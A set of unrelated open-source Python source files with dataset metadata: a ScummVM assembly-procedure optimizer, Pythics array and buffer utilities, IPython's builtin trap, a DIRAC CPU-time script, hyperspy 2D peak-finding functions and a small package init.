# ScummVM - Graphic Adventure Engine # # ScummVM is the legal property of its developers, whose names # are too numerous to list here. Please refer to the COPYRIGHT # file distributed with this source distribution. # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # import re import op class proc: last_addr = 0xc000 def __init__(self, name): self.name = name self.calls = [] self.stmts = [] self.labels = set() self.retlabels = set() self.__label_re = re.compile(r'^(\S+):(.*)$') self.offset = proc.last_addr proc.last_addr += 4 def add_label(self, label): self.stmts.append(op.label(label)) self.labels.add(label) def remove_label(self, label): try: self.labels.remove(label) except: pass for i in xrange(len(self.stmts)): if isinstance(self.stmts[i], op.label) and self.stmts[i].name == label: self.stmts[i] = op._nop(None) return def optimize_sequence(self, cls): i = 0 stmts = self.stmts while i < len(stmts): if not isinstance(stmts[i], cls): i += 1 continue if i > 0 and isinstance(stmts[i - 1], op._rep): #skip rep prefixed instructions for now i += 1 continue j = i + 1 while j < len(stmts): if not isinstance(stmts[j], cls): break j = j + 1 n = j - i if n > 1: print "Eliminate consequtive storage instructions at %u-%u" %(i, j) for k in range(i+1,j): stmts[k] = op._nop(None) stmts[i].repeat = n else: i = j i = 0 while i < len(stmts): if not isinstance(stmts[i], op._rep): i += 1 continue if i + 1 >= len(stmts): break if isinstance(stmts[i + 1], cls): stmts[i + 1].repeat = 'cx' stmts[i + 1].clear_cx = True stmts[i] = op._nop(None) i += 1 return def optimize(self, keep_labels=[]): print "optimizing..." #trivial simplifications while len(self.stmts) and isinstance(self.stmts[-1], op.label): print "stripping last label" self.stmts.pop() #mark labels that directly precede a ret for i in range(len(self.stmts)): if not isinstance(self.stmts[i], op.label): continue j = i while j < len(self.stmts) and isinstance(self.stmts[j], (op.label, op._nop)): j += 1 if j == len(self.stmts) or isinstance(self.stmts[j], op._ret): print "Return label: %s" % (self.stmts[i].name,) self.retlabels.add(self.stmts[i].name) #merging push ax pop bx constructs i = 0 while i + 1 < len(self.stmts): a, b = self.stmts[i], self.stmts[i + 1] if isinstance(a, op._push) and isinstance(b, op._pop): ar, br = a.regs, b.regs movs = [] while len(ar) and len(br): src = ar.pop() dst = br.pop(0) movs.append(op._mov2(dst, src)) if len(br) == 0: self.stmts.pop(i + 1) print "merging %d push-pops into movs" %(len(movs)) for m in movs: print "\t%s <- %s" %(m.dst, m.src) self.stmts[i + 1:i + 1] = movs if len(ar) == 0: self.stmts.pop(i) else: i += 1 #eliminating unused labels for s in list(self.stmts): if not isinstance(s, op.label): continue print "checking label %s..." %s.name used = s.name in keep_labels if s.name not in self.retlabels: for j in self.stmts: if isinstance(j, op.basejmp) and j.label == s.name: print "used" used = True break if not used: print self.labels self.remove_label(s.name) #removing duplicate rets and rets at end for i in xrange(len(self.stmts)): if isinstance(self.stmts[i], op._ret): j = i+1 while j < len(self.stmts) and isinstance(self.stmts[j], op._nop): j += 1 if j == len(self.stmts) or isinstance(self.stmts[j], op._ret): self.stmts[i] = op._nop(None) self.optimize_sequence(op._stosb); self.optimize_sequence(op._stosw); self.optimize_sequence(op._movsb); self.optimize_sequence(op._movsw); def add(self, stmt): #print stmt comment = stmt.rfind(';') if comment >= 0: stmt = stmt[:comment] stmt = stmt.strip() r = self.__label_re.search(stmt) if r is not None: #label self.add_label(r.group(1).lower()) #print "remains: %s" %r.group(2) stmt = r.group(2).strip() if len(stmt) == 0: return s = stmt.split(None) cmd = s[0] cl = getattr(op, '_' + cmd) arg = " ".join(s[1:]) if len(s) > 1 else str() o = cl(arg) self.stmts.append(o) def __str__(self): r = [] for i in self.stmts: r.append(i.__str__()) return "\n".join(r) def visit(self, visitor, skip = 0): for i in xrange(skip, len(self.stmts)): self.stmts[i].visit(visitor)
vanfanel/scummvm
devtools/tasmrecover/tasm/proc.py
Python
gpl-2.0
5,172
[ "VisIt" ]
7a8da207a2065c3a38c8abf70f6809c5d002842add2ce316b728c8719adc1ea6
# -*- coding: utf-8 -*- # # Copyright 2008 - 2013 Brian R. D'Urso # # This file is part of Python Instrument Control System, also known as Pythics. # # Pythics is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Pythics is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Pythics. If not, see <http://www.gnu.org/licenses/>. # # # load libraries # import time import numpy as np # # A buffer for appending data to plots in chunks instead of one point at a time # class AppendBuffer(object): def __init__(self, plot, cols, length, key=None): self.plot = plot self.data = np.zeros([length, cols]) self.length = length self.key = key self.n = 0 def append(self, data): self.data[self.n] = data self.n += 1 if self.n == self.length: if self.key is None: self.plot.append(self.data) else: self.plot.append(self.key, self.data) self.n = 0 def flush(self): if self.n != 0: if self.key is None: self.plot.append(self.data[0:self.n]) else: self.plot.append(self.key, self.data[0:self.n]) self.n = 0 def clear(self): self.n = 0 # # A simple timer useful for updating the GUI every dt seconds # class UpdateTimer(object): def __init__(self, dt=1.0): self.dt = dt self.force = False self.last_time = time.time() def check(self): t = time.time() if ((t - self.last_time) >= self.dt) or self.force: self.last_time = t self.force = False return True else: return False def trigger(self): self.force = True def save_array(data, filename, separator=', ', format='%e', header=None): with open(filename, 'w') as file: if header != None: file.write('%s\n' % header) for row in data: file.write('%s\n' % separator.join([format % val for val in row])) def read_array(filename, separator=', ', comment='#', dtype='float'): with open(filename, "r") as file: data = [] for line in file: stripped_line = line.strip() if len(stripped_line) != 0 and stripped_line[0] != comment: items = stripped_line.split(separator) data.append(map(np.cast[dtype], items)) a = np.array(data, dtype=dtype) return(a) # # Writes array data to file one row at a time # class ArrayFile(object): def __init__(self, filename, separator=', ', format='%e', header=None, mode='w'): self.__file = open(filename, mode) self.separator = separator self.format = format if mode == 'w' and header != None: self.__file.write('%s\n' % header) def write(self, data): self.__file.write('%s\n' % self.separator.join([self.format % val for val in data])) def write_array(self, data): for row in data: self.__file.write('%s\n' % self.separator.join([self.format % val for val in row])) def flush(self): self.__file.flush() def close(self): self.__file.close() # # Circular array for storing and retrieving time series data # class RingBuffer(object): def __init__(self, length, width=1, value=0, dtype=np.float64): self.__width = width # actual array size is twice the requested self.__N = int(length) # the next place to put a value in the buffer self.__n = 0 self.__data = value*np.ones((2*self.__N, self.__width), dtype=dtype) def clear(self, value=0): self.__data = 0 * self.__data + value def read(self, start=-1, stop=0): # choose the copy of the data which is guaranteed to be contiguous n = ((self.__n - 1) % self.__N) + self.__N + 1 return self.__data[n+start:n+stop] def write(self, value): # put data in two places so we can always slice out a contiguous array n = self.__n m = n + self.__N self.__data[n] = value self.__data[m] = value self.__n = (self.__n + 1) % self.__N def write_array(self, value): # for small arrays, it may be faster to just loop over written array, # for example #for i in range(value.shape[0]): # self.write(value[i]) # for large arrays, we can avoid loops n = self.__n m = n + self.__N L = value.shape[0] # grab only last N elements if value array is too long if L > self.__N: L = self.__N value = value[-L:] # n is smaller, so writing is contiguous starting at n self.__data[n:n+L] = value # writing at m must generally be broken up into two parts # the second part must be wrapped around wrapped_L = m + L - 2*self.__N if wrapped_L <= 0: # no need for wrapping self.__data[m:m+L] = value else: unwrapped_L = L - wrapped_L self.__data[m:m+unwrapped_L] = value[0:unwrapped_L] self.__data[0:wrapped_L] = value[unwrapped_L:L] self.__n = (self.__n + L) % self.__N # # Circular array for storing and retrieving time series data # class CircularArray(object): def __init__(self, length, cols=1, dtype=np.float64): self.__cols = cols # actual array size is twice the requested self.__N = int(length) # the next place to put a value in the buffer self.__n_next = 0 self.__data = np.zeros((2*self.__N, self.__cols), dtype=dtype) # the number of rows that have been filled, max is self.__N self.__n_filled = 0 # properties of arrays self.ndim = 2 def clear(self): self.__n_filled = 0 def append(self, value): # convert the appended object to an array if it starts as something else if type(value) is not np.ndarray: value = np.array(value) # add the data if value.ndim == 1: # adding a single row of data # put data in two places so we can always find a contiguous array n = self.__n_next m = n + self.__N self.__data[n] = value self.__data[m] = value self.__n_next = (self.__n_next + 1) % self.__N self.__n_filled = min(self.__n_filled+1, self.__N) elif value.ndim == 2: # adding multiple rows of data # avoid loops for appending large arrays n = self.__n_next m = n + self.__N L = value.shape[0] # grab only last N elements if value array is too long if L > self.__N: L = self.__N value = value[-L:] # n is smaller, so writing is contiguous starting at n self.__data[n:n+L] = value # writing at m must generally be broken up into two parts # the second part must be wrapped around wrapped_L = m + L - 2*self.__N if wrapped_L <= 0: # no need for wrapping self.__data[m:m+L] = value else: unwrapped_L = L - wrapped_L self.__data[m:m+unwrapped_L] = value[0:unwrapped_L] self.__data[0:wrapped_L] = value[unwrapped_L:L] self.__n_next = (self.__n_next + L) % self.__N self.__n_filled = min(self.__n_filled+L, self.__N) def __as_array(self): # choose the copy of the data which is guaranteed to be contiguous n = ((self.__n_next - 1) % self.__N) + self.__N + 1 return self.__data[n-self.__n_filled:n] # some standard array methods @property def shape(self): return (self.__n_filled, self.__cols) def __getitem__(self, key): return self.__as_array().__getitem__(key) def __iter__(self): return self.__as_array().__iter__() def __len__(self): return self.__n_filled def __repr__(self): return self.__as_array().__repr__() def __setitem__(self, key, value): # this is inefficient but simple # rewrite the whole array for any change a = self.__as_array() a.__setitem__(key, value) self.clear() self.append(a) def __str__(self): return self.__as_array().__str__() def sum(self, *args, **kwargs): return self.__as_array().sum(*args, **kwargs) class GrowableArray(object): def __init__(self, length, cols=1, dtype=np.float64): self.__cols = cols self.__initial_length = int(length) # number of rows to grow by if we run out of space self.__n_grow = self.__initial_length self.__dtype = dtype self.clear() # properties of arrays self.ndim = 2 def clear(self): # actual array size self.__N = self.__initial_length # the next place to put a value in the buffer # also the number of rows that have been filled self.__n = 0 # allocate the initial data self.__data = np.zeros((self.__N, self.__cols), dtype=self.__dtype) def append(self, value): # convert the appended object to an array if it starts as something else if type(value) is not np.ndarray: value = np.array(value) # add the data if value.ndim == 1: # adding a single row of data n = self.__n if n + 1 > self.__N: # need to allocate more memory self.__N += self.__n_grow self.__data = np.resize(self.__data, (self.__N, self.__cols)) self.__data[n] = value self.__n = n + 1 elif value.ndim == 2: # adding multiple rows of data # avoid loops for appending large arrays n = self.__n L = value.shape[0] N_needed = n + L - self.__N if N_needed > 0: # need to allocate more memory self.__N += (N_needed / self.__n_grow + 1) * self.__n_grow self.__data = np.resize(self.__data, (self.__N, self.__cols)) self.__data[n:n+L] = value self.__n += L def __as_array(self): return self.__data[:self.__n] # some standard array methods @property def shape(self): return (self.__n, self.__cols) def __getitem__(self, key): return self.__as_array().__getitem__(key) def __iter__(self): return self.__as_array().__iter__() def __len__(self): return self.__n def __repr__(self): return self.__as_array().__repr__() def __setitem__(self, key, value): return self.__as_array().__setitem__(key, value) def __str__(self): return self.__as_array().__str__() def sum(self, *args, **kwargs): return self.__as_array().sum(*args, **kwargs)
LunarLanding/Pythics
pythics/lib.py
Python
gpl-3.0
11,469
[ "Brian" ]
e27b18d3be6083ebef9f8f7fd4a5ccfd3e4a021ac34b4bab7324a6e526f9ffb5
""" A context manager for managing things injected into :mod:`__builtin__`. Authors: * Brian Granger * Fernando Perez """ #----------------------------------------------------------------------------- # Copyright (C) 2010-2011 The IPython Development Team. # # Distributed under the terms of the BSD License. # # Complete license in the file COPYING.txt, distributed with this software. #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- # Imports #----------------------------------------------------------------------------- from traitlets.config.configurable import Configurable from IPython.utils.py3compat import builtin_mod, iteritems from traitlets import Instance #----------------------------------------------------------------------------- # Classes and functions #----------------------------------------------------------------------------- class __BuiltinUndefined(object): pass BuiltinUndefined = __BuiltinUndefined() class __HideBuiltin(object): pass HideBuiltin = __HideBuiltin() class BuiltinTrap(Configurable): shell = Instance('IPython.core.interactiveshell.InteractiveShellABC', allow_none=True) def __init__(self, shell=None): super(BuiltinTrap, self).__init__(shell=shell, config=None) self._orig_builtins = {} # We define this to track if a single BuiltinTrap is nested. # Only turn off the trap when the outermost call to __exit__ is made. self._nested_level = 0 self.shell = shell # builtins we always add - if set to HideBuiltin, they will just # be removed instead of being replaced by something else self.auto_builtins = {'exit': HideBuiltin, 'quit': HideBuiltin, 'get_ipython': self.shell.get_ipython, } # Recursive reload function try: from IPython.lib import deepreload if self.shell.deep_reload: from warnings import warn warn("Automatically replacing builtin `reload` by `deepreload.reload` is deprecated and will be removed in IPython 6.0, please import `reload` explicitly from `IPython.lib.deeprelaod", DeprecationWarning) self.auto_builtins['reload'] = deepreload._dreload else: self.auto_builtins['dreload']= deepreload._dreload except ImportError: pass def __enter__(self): if self._nested_level == 0: self.activate() self._nested_level += 1 # I return self, so callers can use add_builtin in a with clause. return self def __exit__(self, type, value, traceback): if self._nested_level == 1: self.deactivate() self._nested_level -= 1 # Returning False will cause exceptions to propagate return False def add_builtin(self, key, value): """Add a builtin and save the original.""" bdict = builtin_mod.__dict__ orig = bdict.get(key, BuiltinUndefined) if value is HideBuiltin: if orig is not BuiltinUndefined: #same as 'key in bdict' self._orig_builtins[key] = orig del bdict[key] else: self._orig_builtins[key] = orig bdict[key] = value def remove_builtin(self, key, orig): """Remove an added builtin and re-set the original.""" if orig is BuiltinUndefined: del builtin_mod.__dict__[key] else: builtin_mod.__dict__[key] = orig def activate(self): """Store ipython references in the __builtin__ namespace.""" add_builtin = self.add_builtin for name, func in iteritems(self.auto_builtins): add_builtin(name, func) def deactivate(self): """Remove any builtins which might have been added by add_builtins, or restore overwritten ones to their previous values.""" remove_builtin = self.remove_builtin for key, val in iteritems(self._orig_builtins): remove_builtin(key, val) self._orig_builtins.clear() self._builtins_added = False
boompieman/iim_project
project_python2/lib/python2.7/site-packages/IPython/core/builtin_trap.py
Python
gpl-3.0
4,283
[ "Brian" ]
1537e44a1f54dcf1c149f0fa994d3ab3f06fe2e9e0bcdc6a9ef71447e603131a
#!/usr/bin/env python ######################################################################## # File : dirac-wms-get-queue-cpu-time.py # Author : Federico Stagni ######################################################################## """ Report CPU length of queue, in seconds This script is used by the dirac-pilot script to set the CPUTime left, which is a limit for the matching """ from __future__ import print_function from __future__ import absolute_import from __future__ import division import DIRAC from DIRAC.Core.Utilities.DIRACScript import DIRACScript as Script @Script() def main(): Script.registerSwitch("C:", "CPUNormalizationFactor=", "CPUNormalizationFactor, in case it is known") Script.parseCommandLine(ignoreErrors=True) CPUNormalizationFactor = 0.0 for unprocSw in Script.getUnprocessedSwitches(): if unprocSw[0] in ("C", "CPUNormalizationFactor"): CPUNormalizationFactor = float(unprocSw[1]) from DIRAC.WorkloadManagementSystem.Client.CPUNormalization import getCPUTime cpuTime = getCPUTime(CPUNormalizationFactor) # I hate this kind of output... PhC print("CPU time left determined as", cpuTime) DIRAC.exit(0) if __name__ == "__main__": main()
ic-hep/DIRAC
src/DIRAC/WorkloadManagementSystem/scripts/dirac_wms_get_queue_cpu_time.py
Python
gpl-3.0
1,242
[ "DIRAC" ]
0c3754ec10aa4110302668b2f58ff7c1d850055db57120f0a4260a1507da0e8e
# -*- coding: utf-8 -*- # Copyright 2007-2021 The HyperSpy developers # # This file is part of HyperSpy. # # HyperSpy is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # HyperSpy is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with HyperSpy. If not, see <http://www.gnu.org/licenses/>. import copy from numba import njit import numpy as np import scipy.ndimage as ndi from skimage.feature import blob_dog, blob_log, match_template, peak_local_max from hyperspy.misc.machine_learning import import_sklearn NO_PEAKS = np.array([[np.nan, np.nan]]) @njit(cache=True) def _fast_mean(X): # pragma: no cover """JIT-compiled mean of array. Parameters ---------- X : :py:class:`numpy.ndarray` Input array. Returns ------- mean : float Mean of X. Notes ----- Used by scipy.ndimage.generic_filter in the find_peaks_stat method to reduce overhead of repeated Python function calls. See https://github.com/scipy/scipy/issues/8916 for more details. """ return np.mean(X) @njit(cache=True) def _fast_std(X): # pragma: no cover """JIT-compiled standard deviation of array. Parameters ---------- X : :py:class:`numpy.ndarray` Input array. Returns ------- std : float Standard deviation of X. Notes ----- Used by scipy.ndimage.generic_filter in the find_peaks_stat method to reduce overhead of repeated Python function calls. See https://github.com/scipy/scipy/issues/8916 for more details. """ return np.std(X) def clean_peaks(peaks): """Sort array of peaks and deal with no peaks being found. Parameters ---------- peaks : :py:class:`numpy.ndarray` Array of found peaks. Returns ------- peaks : :py:class:`numpy.ndarray` Sorted array, first by `peaks[:,1]` (y-coordinate) then by `peaks[:,0]` (x-coordinate), of found peaks. NO_PEAKS : str Flag indicating no peaks found. """ if len(peaks) == 0: return NO_PEAKS else: ind = np.lexsort((peaks[:,0], peaks[:,1])) return peaks[ind] def find_local_max(z, **kwargs): """Method to locate positive peaks in an image by local maximum searching. This function wraps :py:func:`skimage.feature.peak_local_max` function and sorts the results for consistency with other peak finding methods. Parameters ---------- z : :py:class:`numpy.ndarray` Array of image intensities. **kwargs : dict Keyword arguments to be passed to the ``peak_local_max`` method of the ``scikit-image`` library. See its documentation for details http://scikit-image.org/docs/dev/api/skimage.feature.html#peak-local-max Returns ------- peaks : :py:class:`numpy.ndarray` of shape (n_peaks, 2) Peak pixel coordinates. """ peaks = peak_local_max(z, **kwargs) return clean_peaks(peaks) def find_peaks_minmax(z, distance=5., threshold=10.): """Method to locate the positive peaks in an image by comparing maximum and minimum filtered images. Parameters ---------- z : numpy.ndarray Matrix of image intensities. distance : float Expected distance between peaks. threshold : float Minimum difference between maximum and minimum filtered images. Returns ------- peaks : :py:class:`numpy.ndarray` of shape (n_peaks, 2) Peak pixel coordinates. """ data_max = ndi.filters.maximum_filter(z, distance) maxima = (z == data_max) data_min = ndi.filters.minimum_filter(z, distance) diff = ((data_max - data_min) > threshold) maxima[diff == 0] = 0 labeled, num_objects = ndi.label(maxima) peaks = np.array( ndi.center_of_mass(z, labeled, range(1, num_objects + 1))) return clean_peaks(np.round(peaks).astype(int)) def find_peaks_max(z, alpha=3., distance=10): """Method to locate positive peaks in an image by local maximum searching. Parameters ---------- alpha : float Only maxima above `alpha * sigma` are found, where `sigma` is the standard deviation of the image. distance : int When a peak is found, all pixels in a square region of side `2 * distance` are set to zero so that no further peaks can be found in that region. Returns ------- peaks : :py:class:`numpy.ndarray` of shape (n_peaks, 2) Peak pixel coordinates. """ # preallocate lots of peak storage k_arr = [] # copy image image_temp = copy.deepcopy(z) peak_ct = 0 # calculate standard deviation of image for thresholding sigma = np.std(z) while True: k = np.argmax(image_temp) j, i = np.unravel_index(k, image_temp.shape) if image_temp[j, i] >= alpha * sigma: k_arr.append([j, i]) # masks peaks already identified. x = np.arange(i - distance, i + distance) y = np.arange(j - distance, j + distance) xv, yv = np.meshgrid(x, y) # clip to handle peaks near image edge image_temp[yv.clip(0, image_temp.shape[0] - 1), xv.clip(0, image_temp.shape[1] - 1)] = 0 peak_ct += 1 else: break peaks = np.array(k_arr) return clean_peaks(peaks) def find_peaks_zaefferer(z, grad_threshold=0.1, window_size=40, distance_cutoff=50.): """Method to locate positive peaks in an image based on gradient thresholding and subsequent refinement within masked regions. Parameters ---------- z : :py:class:`numpy.ndarray` Matrix of image intensities. grad_threshold : float The minimum gradient required to begin a peak search. window_size : int The size of the square window within which a peak search is conducted. If odd, will round down to even. The size must be larger than 2. distance_cutoff : float The maximum distance a peak may be from the initial high-gradient point. Returns ------- peaks : :py:class:`numpy.ndarray` of shape (n_peaks, 2) Peak pixel coordinates. Notes ----- Implemented as described in Zaefferer "New developments of computer-aided crystallographic analysis in transmission electron microscopy" J. Ap. Cryst. This version by Ben Martineau (2016) """ def box(x, y, window_size, x_max, y_max): """Produces a list of coordinates in the box about (x, y).""" a = int(window_size / 2) x_min = max(0, x - a) x_max = min(x_max, x + a) y_min = max(0, y - a) y_max = min(y_max, y + a) return np.mgrid[x_min:x_max, y_min:y_max].reshape(2, -1, order="F") def get_max(image, box): """Finds the coordinates of the maximum of 'image' in 'box'.""" vals = image[tuple(box)] ind = np.argmax(vals) return tuple(box[:, ind]) def squared_distance(x, y): """Calculates the squared distance between two points.""" return (x[0] - y[0]) ** 2 + (x[1] - y[1]) ** 2 def gradient(image): """Calculates the square of the 2-d partial gradient. Parameters ---------- image : :py:class:`numpy.ndarray` The image for which the gradient will be calculated. Returns ------- gradient_of_image : :py:class:`numpy.ndarray` The gradient of the image. """ gradient_of_image = np.gradient(image) gradient_of_image = gradient_of_image[0] ** 2 + gradient_of_image[ 1] ** 2 return gradient_of_image # Check window size is appropriate. if window_size < 2: raise ValueError("`window_size` must be >= 2.") # Generate an ordered list of matrix coordinates. if len(z.shape) != 2: raise ValueError("'z' should be a 2-d image matrix.") z = z / np.max(z) coordinates = np.indices(z.data.shape).reshape(2, -1).T # Calculate the gradient at every point. image_gradient = gradient(z) # Boolean matrix of high-gradient points. coordinates = coordinates[(image_gradient >= grad_threshold).flatten()] # Compare against squared distance (avoids repeated sqrt calls) distance_cutoff_sq = distance_cutoff ** 2 peaks = [] for coordinate in coordinates: # Iterate over coordinates where the gradient is high enough. b = box(coordinate[0], coordinate[1], window_size, z.shape[0], z.shape[1]) p_old = (0, 0) p_new = get_max(z, b) while p_old[0] != p_new[0] and p_old[1] != p_new[1]: p_old = p_new b = box(p_old[0], p_old[1], window_size, z.shape[0], z.shape[1]) p_new = get_max(z, b) if squared_distance(coordinate, p_new) > distance_cutoff_sq: break peaks.append(p_new) peaks = np.array([p for p in set(peaks)]) return clean_peaks(peaks) def find_peaks_stat(z, alpha=1.0, window_radius=10, convergence_ratio=0.05): """Method to locate positive peaks in an image based on statistical refinement and difference with respect to mean intensity. Parameters ---------- z : :py:class:`numpy.ndarray` Array of image intensities. alpha : float Only maxima above `alpha * sigma` are found, where `sigma` is the local, rolling standard deviation of the image. window_radius : int The pixel radius of the circular window for the calculation of the rolling mean and standard deviation. convergence_ratio : float The algorithm will stop finding peaks when the proportion of new peaks being found is less than `convergence_ratio`. Returns ------- peaks : :py:class:`numpy.ndarray` of shape (n_peaks, 2) Peak pixel coordinates. Notes ----- Implemented as described in the PhD thesis of Thomas White, University of Cambridge, 2009, with minor modifications to resolve ambiguities. The algorithm is as follows: 1. Adjust the contrast and intensity bias of the image so that all pixels have values between 0 and 1. 2. For each pixel, determine the mean and standard deviation of all pixels inside a circle of radius 10 pixels centered on that pixel. 3. If the value of the pixel is greater than the mean of the pixels in the circle by more than one standard deviation, set that pixel to have an intensity of 1. Otherwise, set the intensity to 0. 4. Smooth the image by convovling it twice with a flat 3x3 kernel. 5. Let k = (1/2 - mu)/sigma where mu and sigma are the mean and standard deviations of all the pixel intensities in the image. 6. For each pixel in the image, if the value of the pixel is greater than mu + k*sigma set that pixel to have an intensity of 1. Otherwise, set the intensity to 0. 7. Detect peaks in the image by locating the centers of gravity of regions of adjacent pixels with a value of 1. 8. Repeat #4-7 until the number of peaks found in the previous step converges to within the user defined convergence_ratio. """ if not import_sklearn.sklearn_installed: raise ImportError("This method requires scikit-learn.") def normalize(image): """Scales the image to intensities between 0 and 1.""" return image / np.max(image) def _local_stat(image, radius, func): """Calculates rolling method 'func' over a circular kernel.""" x, y = np.ogrid[-radius : radius + 1, -radius : radius + 1] kernel = np.hypot(x, y) < radius stat = ndi.filters.generic_filter(image, func, footprint=kernel) return stat def local_mean(image, radius): """Calculates rolling mean over a circular kernel.""" return _local_stat(image, radius, _fast_mean) def local_std(image, radius): """Calculates rolling standard deviation over a circular kernel.""" return _local_stat(image, radius, _fast_std) def single_pixel_desensitize(image): """Reduces single-pixel anomalies by nearest-neighbor smoothing.""" kernel = np.array([[0.5, 1, 0.5], [1, 1, 1], [0.5, 1, 0.5]]) smoothed_image = ndi.filters.generic_filter(image, _fast_mean, footprint=kernel) return smoothed_image def stat_binarise(image): """Peaks more than one standard deviation from the mean set to one.""" image_rolling_mean = local_mean(image, window_radius) image_rolling_std = local_std(image, window_radius) image = single_pixel_desensitize(image) binarised_image = np.zeros(image.shape) stat_mask = image > (image_rolling_mean + alpha * image_rolling_std) binarised_image[stat_mask] = 1 return binarised_image def smooth(image): """Image convolved twice using a uniform 3x3 kernel.""" image = ndi.filters.uniform_filter(image, size=3) image = ndi.filters.uniform_filter(image, size=3) return image def half_binarise(image): """Image binarised about values of one-half intensity.""" binarised_image = np.where(image > 0.5, 1, 0) return binarised_image def separate_peaks(binarised_image): """Identify adjacent 'on' coordinates via DBSCAN.""" bi = binarised_image.astype("bool") coordinates = np.indices(bi.shape).reshape(2, -1).T[bi.flatten()] db = import_sklearn.sklearn.cluster.DBSCAN(2, min_samples=3) peaks = [] if coordinates.shape[0] > 0: # we have at least some peaks labeled_points = db.fit_predict(coordinates) for peak_label in list(set(labeled_points)): peaks.append(coordinates[labeled_points == peak_label]) return peaks def _peak_find_once(image): """Smooth, binarise, and find peaks according to main algorithm.""" image = smooth(image) # 4 image = half_binarise(image) # 5 peaks = separate_peaks(image) # 6 centers = np.array([np.mean(peak, axis=0) for peak in peaks]) # 7 return image, centers def stat_peak_finder(image, convergence_ratio): """Find peaks in image. Algorithm stages in comments.""" # Image preparation image = normalize(image) # 1 image = stat_binarise(image) # 2, 3 # Perform first iteration of peak finding image, peaks_curr = _peak_find_once(image) # 4-7 n_peaks = len(peaks_curr) if n_peaks == 0: return peaks_curr m_peaks = 0 # Repeat peak finding with more blurring to convergence while (n_peaks - m_peaks) / n_peaks > convergence_ratio: # 8 m_peaks = n_peaks peaks_old = np.copy(peaks_curr) image, peaks_curr = _peak_find_once(image) n_peaks = len(peaks_curr) if n_peaks == 0: return peaks_old return peaks_curr return clean_peaks(stat_peak_finder(z, convergence_ratio)) def find_peaks_dog(z, min_sigma=1., max_sigma=50., sigma_ratio=1.6, threshold=0.2, overlap=0.5, exclude_border=False): """Method to locate peaks via the Difference of Gaussian Matrices method. This function wraps :py:func:`skimage.feature.blob_dog` function and sorts the results for consistency with other peak finding methods. Parameters ---------- z : :py:class:`numpy.ndarray` 2-d array of intensities min_sigma, max_sigma, sigma_ratio, threshold, overlap, exclude_border : Additional parameters to be passed to the algorithm. See `blob_dog` documentation for details: http://scikit-image.org/docs/dev/api/skimage.feature.html#blob-dog Returns ------- peaks : :py:class:`numpy.ndarray` of shape (n_peaks, 2) Peak pixel coordinates. Notes ----- While highly effective at finding even very faint peaks, this method is sensitive to fluctuations in intensity near the edges of the image. """ z = z / np.max(z) blobs = blob_dog(z, min_sigma=min_sigma, max_sigma=max_sigma, sigma_ratio=sigma_ratio, threshold=threshold, overlap=overlap, exclude_border=exclude_border) try: centers = np.round(blobs[:, :2]).astype(int) except IndexError: return NO_PEAKS clean_centers = [] for center in centers: if len(np.intersect1d(center, (0, 1) + z.shape + tuple( c - 1 for c in z.shape))) > 0: continue clean_centers.append(center) return clean_peaks(np.array(clean_centers)) def find_peaks_log(z, min_sigma=1., max_sigma=50., num_sigma=10, threshold=0.2, overlap=0.5, log_scale=False, exclude_border=False): """Method to locate peaks via the Laplacian of Gaussian Matrices method. This function wraps :py:func:`skimage.feature.blob_log` function and sorts the results for consistency with other peak finding methods. Parameters ---------- z : :py:class:`numpy.ndarray` Array of image intensities. min_sigma, max_sigma, num_sigma, threshold, overlap, log_scale, exclude_border : Additional parameters to be passed to the ``blob_log`` method of the ``scikit-image`` library. See its documentation for details: http://scikit-image.org/docs/dev/api/skimage.feature.html#blob-log Returns ------- peaks : :py:class:`numpy.ndarray` of shape (n_peaks, 2) Peak pixel coordinates. """ z = z / np.max(z) if isinstance(num_sigma, float): raise ValueError("`num_sigma` parameter should be an integer.") blobs = blob_log(z, min_sigma=min_sigma, max_sigma=max_sigma, num_sigma=num_sigma, threshold=threshold, overlap=overlap, log_scale=log_scale, exclude_border=exclude_border) # Attempt to return only peak positions. If no peaks exist, return an # empty array. try: centers = np.round(blobs[:, :2]).astype(int) ind = np.lexsort((centers[:,0], centers[:,1])) except IndexError: return NO_PEAKS return centers[ind] def find_peaks_xc(z, template, distance=5, threshold=0.5, **kwargs): """Find peaks in the cross correlation between the image and a template by using the :py:func:`~hyperspy.utils.peakfinders2D.find_peaks_minmax` function to find the peaks on the cross correlation result obtained using the :py:func:`skimage.feature.match_template` function. Parameters ---------- z : :py:class:`numpy.ndarray` Array of image intensities. template : numpy.ndarray (square) Array containing a single bright disc, similar to those to detect. distance : float Expected distance between peaks. threshold : float Minimum difference between maximum and minimum filtered images. **kwargs : dict Keyword arguments to be passed to the :py:func:`skimage.feature.match_template` function. Returns ------- peaks : :py:class:`numpy.ndarray` of shape (n_peaks, 2) Array of peak coordinates. """ pad_input = kwargs.pop('pad_input', True) response_image = match_template(z, template, pad_input=pad_input, **kwargs) peaks = find_peaks_minmax(response_image, distance=distance, threshold=threshold) return clean_peaks(peaks)
thomasaarholt/hyperspy
hyperspy/utils/peakfinders2D.py
Python
gpl-3.0
20,090
[ "Gaussian" ]
ed57635893ff8dac9623521d97c81d8dd86908662407699fd888b2bc2ee14563
import menu import newgame import galaxy import planet import star import research
jespino/GalaxduS
libs/screens/__init__.py
Python
gpl-3.0
83
[ "Galaxy" ]
0aff78a4e9362f84eb1aeed459267b8e5eb6314560713924dac258bdea36695a
